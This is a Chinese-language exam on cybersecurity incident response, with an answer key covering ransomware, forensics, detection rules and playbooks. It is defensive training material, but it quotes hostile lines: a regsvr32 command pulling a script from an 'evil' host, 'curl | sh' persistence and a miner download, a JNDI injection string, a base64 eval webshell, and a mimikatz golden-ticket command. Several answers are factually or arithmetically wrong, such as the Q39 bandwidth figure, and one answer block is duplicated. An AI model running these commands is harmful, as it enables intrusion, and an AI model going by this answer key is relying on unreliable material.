2026年网络安全应急响应与处置考试

2026年网络安全应急响应与处置考试一、单项选择题（每题2分，共30分）1.某单位在凌晨2点发现核心数据库被加密，文件后缀统一变为“.locked”，并在桌面出现勒索提示。下列哪项处置顺序最符合“先止损、后取证”原则？A.立即支付赎金→恢复业务→留存交易哈希→事后审计B.断开网络→拍照截屏→计算文件哈希→上报监管部门C.先镜像内存→再断网→最后通知公关部门发声明D.先通知值班经理→再决定要不要断电→再联系保险公司答案：B解析：勒索软件首要任务是阻止横向移动，断网为第一步；拍照截屏固定可视化证据；计算哈希保证证据链完整；上报满足合规要求。支付赎金、公关声明均属后续决策。2.在Windows取证中，以下哪个日志最先记录用户通过RDP成功登录的时间？A.Microsoft-Windows-TerminalServices-LocalSessionManager/OperationalB.Security日志ID4624C.System日志ID6005D.Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational答案：A解析：LocalSessionManager日志在RDP会话建立瞬间即写入，早于Security4624（后者记录身份验证完成）。6005为事件日志服务启动，不特指RDP。3.使用Suricata检测横向移动，下列哪条规则最能发现“基于命名管道”的PsExec活动？A.alertsmbanyany->any445(msg:"PsExec";content:"|ff|SMB|2400|";)B.alertsmbanyany->any445(msg:"PsExecservice";content:"|5c00|P|s|E|x|e|c|";nocase;)C.alerttcpanyany->any135(msg:"PsExecDCOM";dce_opnum:2;)D.alerthttpanyany->any80(msg:"PsExecoverHTTP";http_uri;content:"psexec";)答案：B解析：PsExec在目标端创建名为“PSEXESVC”的管道，Unicode明文出现在SMBWrite请求中，选项B命中该特征。4.某SOC收到告警：外网IP对mail端口25持续发送“MAILFROM:<postmaster@内部域名>”，但无后续DATA。最可能的攻击阶段是：A.初始访问B.收集C.侦察D.影响答案：C解析：攻击者通过SMTP枚举验证内部域名是否存在，属于侦察阶段，尚未进入投递或利用。5.在Linux应急响应中，发现cron.hourly目录下出现隐藏文件“.httpd”，其内容包含“curl/bash|sh”。为阻断持续控制，下列哪条命令可在不重启系统的前提下立即生效？A.systemctlstopcrondB.echo>>/etc/hosts.denyC.iptables-AOUTPUT-d-jDROPD.chmod000/usr/bin/curl答案：C解析：iptables立即屏蔽外联C2，无需重启且不影响业务；停止crond会中断合法定时任务；hosts.deny对纯IP无效；chmodcurl可绕过。6.关于内存取证，下列描述正确的是：A.Windows页面文件pagefile.sys包含完整物理内存镜像B.Linux/proc/kcore读取需root，但内容随进程退出而消失C.Volatility的linux_check_afinfo插件可检测修改过的系统调用表D.在UEFISecureBoot开启时，内存获取工具必然无法加载驱动答案：C解析：linux_check_afinfo通过比对file_operations指针发现rootkit劫持；A错，页面文件不包全部内存；B错，/proc/kcore为实时内存接口；D错，经签名的获取驱动仍可加载。7.某企业采用EDR，发现大量终端出现“regsvr32.exe/s/n/u/i:http://evil/sc.sctscrobj.dll”进程。该手法利用了哪类白名单绕过？A.DLL搜索顺序劫持B.无文件落地C.签名代理执行D.进程镂空答案：C解析：regsvr32为微软签名程序，通过远程脚本URL实现“代理”执行，属于Living-off-the-Land。8.在ATT&CK矩阵中，“T1562.001DisableWindowsEventLogging”最可能出现在哪两个阶段？A.初始访问与执行B.持久化与防御规避C.发现与横向移动D.收集与渗出答案：B解析：禁用日志既为维持长期控制（持久化），也为避免检测（防御规避）。9.某云租户发现ECS实例CPU利用率飙至98%，但top命令看不到进程。最优先的排查动作是：A.重启实例B.使用busyboxtop查看隐藏进程C.在云平台制作快照D.提交工单申请更换宿主机答案：B解析：top被rootkit劫持时busybox静态编译版可绕过；重启将丢失内存证据；快照虽重要但非“最优先”。10.关于日志留存期限，等保2.0对三级系统的要求是：A.不少于30天B.不少于6个月C.不少于1年D.不少于3年答案：B解析：GB/T22239-2019明确要求三级系统留存日志至少6个月。11.在威胁狩猎假设“攻击者使用合法云盘作为C2”中，下列哪项指标最适合作为KQL查询入口？A.外联IP位于AlexaTop1000B.用户代理包含“OneDrive-API”且进程为powershell.exeC.TLS证书自签名D.DNS查询数量大于1000次/小时答案：B解析：合法云盘API结合PowerShell为典型LoLBA特征，可直接关联狩猎。12.某单位采用零信任架构，当身份认证服务（IdP）遭遇DDoS导致不可用，下列哪项应急措施最符合零信任“持续验证”原则？A.临时关闭所有访问控制，保证业务连续性B.启用本地缓存的短期令牌，并缩短有效期C.提升所有用户权限至管理员，减少认证频次D.将流量引流至备用IdP，但不验证令牌签名答案：B解析：缓存令牌+缩短有效期可在IdP故障时维持“有限验证”，兼顾安全与可用。13.在工业控制系统（ICS）应急响应中，发现PLC程序块被篡改，但固件版本号未变。最可靠的取证对象是：A.工程师站源代码B.PLC闪存完整镜像C.交换机NetFlowD.HMI运行日志答案：B解析：闪存镜像含程序块与隐藏元数据，可对比哈希发现篡改；源代码与运行实例可能不一致。14.使用Snort检测Heartbleed，下列哪条规则选项可准确匹配TLS心跳请求长度字段异常？A.content:"|1803|";offset:0;depth:2;byte_test:2,>,100,3,relative;B.content:"|1803|";offset:0;depth:2;byte_jump:2,0;C.content:"|1803|";offset:0;depth:2;byte_test:2,>,16384,0,relative;D.content:"|1603|";offset:0;depth:2;byte_test:1,=,1,5,relative;答案：A解析：心跳请求类型为24（0x18），后随2字节长度；若长度>100即异常；16384为最大片段长度，不具区分度。15.某单位进行红蓝对抗，蓝队需在不阻断生产流量前提下快速定位内网横向移动。最佳技术组合是：A.端口镜像+Zeek+ELKB.全流量TCPRST注入C.镜像+Wireshark手动逐包分析D.仅依赖Windows事件日志答案：A解析：Zeek可生成高阶日志，ELK实时检索，兼顾自动化与可视化；RST注入影响业务；手动分析效率低；事件日志无法覆盖Linux。二、多项选择题（每题3分，共30分）16.关于Log4j2漏洞（CVE-2021-44228）应急处置，下列哪些做法可在边界网关立即阻断大多数利用？A.部署WAF规则拦截${jndi:ldap://B.在防火墙限制出站53端口C.在IDS规则中匹配“javaClassName”D.在反向代理层统一升级Log4j2至2.17.0E.在DNS服务器配置域前置重写答案：A、B、D解析：A阻断JNDI注入特征；B限制外联LDAP/RMI；D彻底修复；C对流量检测滞后；E域前置与Log4j无关。17.在Linux取证中，以下哪些文件或命令可帮助确认攻击者是否使用“动态链接器劫持”技术？A./etc/ld.so.preloadB.ldd/bin/lsC.readelf-d/bin/ls|grepPATHD.~/.bash_historyE./proc/sys/kernel/core_pattern答案：A、B、C解析：ld.so.preload为劫持入口；ldd与readelf可发现异常库；bash_history仅记录命令；core_pattern与崩溃转储相关。18.针对“无文件”PowerShell攻击，蓝队可采取哪些有效对抗措施？A.启用AMSI并更新签名B.配置ConstrainedLanguageModeC.禁用wscript.exeD.启用Sysmon事件ID4103日志E.在GPO设置“禁用PowerShellv2”答案：A、B、D、E解析：AMSI可拦截恶意脚本；CLM限制API；Sysmon4103记录脚本块；v2无日志记录；wscript与PowerShell无关。19.在容器逃逸场景，哪些指标可判定攻击者已获取宿主机root？A./var/log/audit/audit.log出现“uid=0auid=1000”B.cgroup释放通知显示“devicecgroup:user1000:1000”C.dockerd日志出现“containerd-shimexited:runc”D.宿主机/etc/shadow新增未知用户E.容器内capsh--print显示cap_sys_admin答案：A、D解析：uid=0且auid≠0说明提权；shadow新增用户为明显痕迹；cgroup与runc日志为正常；容器内cap_sys_admin未逃逸。20.关于“双因子认证”绕过，以下哪些攻击路径真实存在？A.通过SIM交换劫持SMS验证码B.利用OAuth2refreshtoken重放C.修改LDAP属性userAccountControl绕过TOTPD.使用MFA疲劳轰炸诱导用户点击ApproveE.在Kerberos预认证阶段注入伪造PAC答案：A、B、D解析：SIM交换、refreshtoken重放、MFA轰炸均为公开案例；userAccountControl无法关闭TOTP；PAC注入与MFA无关。21.在Windows日志清除场景，下列哪些工具或命令会留下“事件日志被清除”痕迹？A.wevtutilclSecurityB.Clear-EventLog-LogNameSecurityC.使用“事件查看器”GUI点击“清除日志”D.使用WinAPIEvtClearLogE.直接删除C:\Windows\System32\winevt\Logs\Security.evtx答案：A、B、C、D解析：前四种均生成事件ID1102“日志已清除”；直接删除evtx文件不产生1102，但会留下文件系统元数据。22.针对“供应链”攻击，企业可部署哪些技术措施降低风险？A.强制SBOM（软件物料清单）入库B.在CI/CD阶段进行二进制签名验证C.对第三方库运行时进行动态沙箱监控D.关闭所有外部源更新，仅使用离线补丁E.采用ReproducibleBuild比对哈希答案：A、B、C、E解析：SBOM、签名、沙箱、可重现构建均为有效技术；完全离线不现实且无法及时修复漏洞。23.在应急响应报告撰写中，必须包含哪些要素才能通过司法取证审查？A.时间线（Timeline）B.工具版本与校验值C.操作录像或截屏D.调查人员签字E.受害单位盖章答案：A、B、C、D解析：司法要求证据链完整，时间线、工具校验、录像、签字为必备；单位盖章非法律强制。24.关于“DNSoverHTTPS（DoH）”对企业防御的影响，下列哪些描述正确？A.传统DNS黑洞失效B.可绕过本地DNS安全策略C.增加流量解密性能开销D.可通过浏览器策略禁用E.在TLS1.3下无法检测SNI答案：A、B、C、D解析：DoH加密导致黑洞、策略绕过；解密需性能；GPO可禁DoH；TLS1.3仍暴露SNI（ESNI未普及）。25.在“勒索软件即服务（RaaS）”趋势下，企业应急演练应覆盖哪些场景？A.核心备份被加密且云同步覆盖B.攻击者先窃取数据再加密C.攻击者威胁公开数据以索要赎金D.攻击者提供解密测试以证明能力E.攻击者通过智能合约自动释放解密工具答案：A、B、C、D解析：均为真实RaaS案例；智能合约释放尚处概念阶段。三、判断题（每题1分，共10分）26.在Windows系统中，安全日志ID4672表示特殊权限登录，可用于发现Pass-the-Hash攻击。答案：√解析：4672记录具有“SeDebugPrivilege”等敏感权限的登录，常见于哈希传递。27.使用“chmod000/bin/chmod”可彻底防止攻击者修改文件权限。答案：×解析：攻击者可通过busybox、pythonos.chmod、libc调用恢复权限。28.在Linux内存取证中，/proc/kcore大小始终等于物理内存容量。答案：×解析：/proc/kcore包含内核空间及空洞，大小≥物理内存，不一定相等。29.零信任架构下，网络位置不再作为信任依据，因此不再需要VPN。答案：×解析：VPN仍可作为加密通道，但身份与设备状态成为主要信任基础。30.使用Volatility的malfind插件可发现被注入的匿名可执行内存页。答案：√解析：malfind通过VAD属性寻找PAGE_EXECUTE_READWRITE且无文件支撑的页面。31.在容器环境中，seccomp规则可限制系统调用，因此即使容器以root运行也无法逃逸。答案：×解析：seccomp仅限制调用，若内核漏洞存在仍可提权。32.等保2.0要求四级系统每年至少进行一次应急演练。答案：√解析：GB/T25070-2019明确规定四级系统年度演练。33.使用SHA-1比对恶意文件哈希仍可满足司法取证完整性要求。答案：×解析：SHA-1已被攻破，需使用SHA-256或更强算法。34.在Windows11中，启用VBS（Virtualization-basedSecurity）可防止LMHash内存存储。答案：√解析：VBS与CredentialGuard隔离LSA，阻止LMHash内存提取。35.勒索软件加密文件后，立即对文件做“undelete”可恢复原始内容。答案：×解析：现代勒索软件使用就地加密+清零，删除后数据已被覆盖。四、简答题（每题10分，共30分）36.描述一次完整的“WebShell”应急响应流程，要求涵盖发现、隔离、取证、分析、根除、恢复六个阶段，并给出每阶段关键命令或工具（Linux环境）。答案：发现：WAF持续告警“POST/upload.php200560B”，HIDS发现/var/www/html/.conf.php含“eval(base64_decode”。隔离：iptables-AINPUT-s攻击者IP-jDROP；dockerpauseweb容器；nginx返回503。取证：ddif=/dev/vdaof=/forensic/disk.imgbs=1M；vol-f/forensic/mem.dump–profile=LinuxUbuntu20x64linux_recover_filesystem；tar-czfwebshell.tar.gz/var/www/html/.conf.php。分析：strings.conf.php|grep-E“(exec|system|passthru)”；使用ghidra反混淆base64，发现C2为hxxp://bad/c2.php；查audit.log发现www-data通过curl外联。根除：rm-f/var/www/html/.conf.php；dockercommit新镜像；重建容器并挂载只读层；更新upload.phpMIME白名单。恢复：从Git回滚代码；重新压测；解除iptables；提交事件报告。37.给出利用“黄金票据”进行横向移动的完整攻击链，并说明蓝队如何通过多源日志关联发现该攻击。答案：攻击链：1.攻击者获取KRBTGT哈希（如NTDS.dit导出）；2.使用mimikatzkerberos::golden/domain:corp/sid:S-1-5-21-xxx/user:fakeadmin/krbtgt:hash生成票据；3.注入内存后访问DC共享\\dc01\c$；4.创建计划任务实现持久化。蓝队关联：1.安全日志ID4769（TGT请求）中“TicketEncryptionType”为0x17（RC4），与策略AES-256不符；2.4768中“Pre-AuthType”=2，但登录IP从未出现该账户；3.流量侧Zeek日志出现KerberosTGT（非TGS）且生命周期为10年；4.将4769的“LogonGUID”与4624关联，发现源IP为普通工作站；5.通过SIEM时间窗口聚合，产生高置信告警。38.某企业采用Kubernetes，发现Pod频繁重启且CPU飙高，kubectllogs无输出。请给出排查思路及关键命令，并说明如何确认是否为“挖矿”容器逃逸至宿主机。答案：排查：1.kubectldescribepod查看LastState是否为“OOMKilled”；2.kubectlexec-itpod–sh进入后top发现minerd进程；3.宿主机运行psaux|grepminerd若存在，则已逃逸；4.检查/var/lib/kubelet/pods//volumes/kubernetes.io~empty-dir/是否存在恶意二进制；5.使用ctr-nk8s.ioclist对比容器内进程与宿主机namespace；6.查看/sys/fs/cgroup/freezer/kubepods/podxxx/freezer.state是否为THAWED；7.若宿主机/lib/systemd/system/kubelet.service.d被写入[Service]ExecStartPre=curlminer.sh，则确认逃逸。排查：1.kubectldescribepod查看LastState是否为“OOMKilled”；2.kubectlexec-itpod–sh进入后top发现minerd进程；3.宿主机运行psaux|grepminerd若存在，则已逃逸；4.检查/var/lib/kubelet/pods//volumes/kubernetes.io~empty-dir/是否存在恶意二进制；5.使用ctr-nk8s.ioclist对比容器内进程与宿主机namespace；6.查看/sys/fs/cgroup/freezer/kubepods/podxxx/freezer.state是否为THAWED；7.若宿主机/lib/systemd/system/kubelet.service.d被写入[Service]ExecStartPre=curlminer.sh，则确认逃逸。确认：计算宿主机/usr/bin/k8s-miner哈希，与容器内文件一致，且容器cap_add=SYS_ADMIN，说明通过挂载宿主机/proc逃逸。五、计算与案例分析题（共30分）39.案例：某单位内网主机0遭暴力破解RDP，安全日志显示30分钟内出现4625（登录失败）共2700次，均来自同一外网IP。已知该单位出口带宽为100Mbps，RDP平均认证流量为15KB/次。（1）计算攻击流量占总带宽比例。（2）若部署Fail2ban，设置bantime=600s、maxretry=5、findtime=300s，求理论最大拦截次数。（3）给出Suricata规则，要求匹配RDP暴力破解且TPS>10时触发。答案：（1）总流量=2700×15KB=40500KB=324000Kb=324Mbps占比=324Mbps÷100Mbps=3.24倍，即324%（已拥塞）（2）在300s窗口内，最多允许5次失败，第6次触发。30分钟=1800s，窗口滑动，每300s可触发1800÷300=6个周期，每周期至少1次拦截，故最大拦截次数=6次。（3）Suricata规则：alerttcpanyany->/243389(msg:"RDPBruteForce";flow:to_server;content:"|0300|";offset:0;depth:2;threshold:typeboth,trackby_src,count10,seconds60;sid:10001;)40.案例：某电商数据库被加密，攻击者留下BTC地址，要求支付5BTC。企业拥有完整备份，但备份间隔24小时，可能丢失当日订单。已知当日订单价值约200万元，恢复时间目标RTO=6h，恢复点目标RPO≤1h。给出不支付赎金的应急恢复方案，并计算最大可接受损失。答案：方案：1.立即启动备用RDS只读实例，基于binlog实时回放至加密前1小时，满足RPO≤1h；2.通过CDN回源切换至备用域名，减少业务中断；3.订单异步队列（Kafka）保留12小时，重放未加密订单；4.人工核对加密前1小时至事件点订单，约200万×1/24≈8.3万元；5.6小时内完成切换与核对，满足RTO。最大可接受损失：8.3万元，远低于5BTC（约90万元），故不支付。六、综合设计题（20分）41.设计一套“云原生”勒索软件应急响应playbook，要求：（1）覆盖ACK（阿里云Kubernetes）+OSS+RDS架构；（2）包含检测、遏制、取证、eradication、恢复、复盘六阶段；（3）给出每项负责角色（SRE、CISO、DBA、Legal、PR）；（4）提供三项可自动化Lambda/Function代码片段（Python），分别用于：a.一键关闭所有公网SLB；b.为所有Pod添加只读安全策略；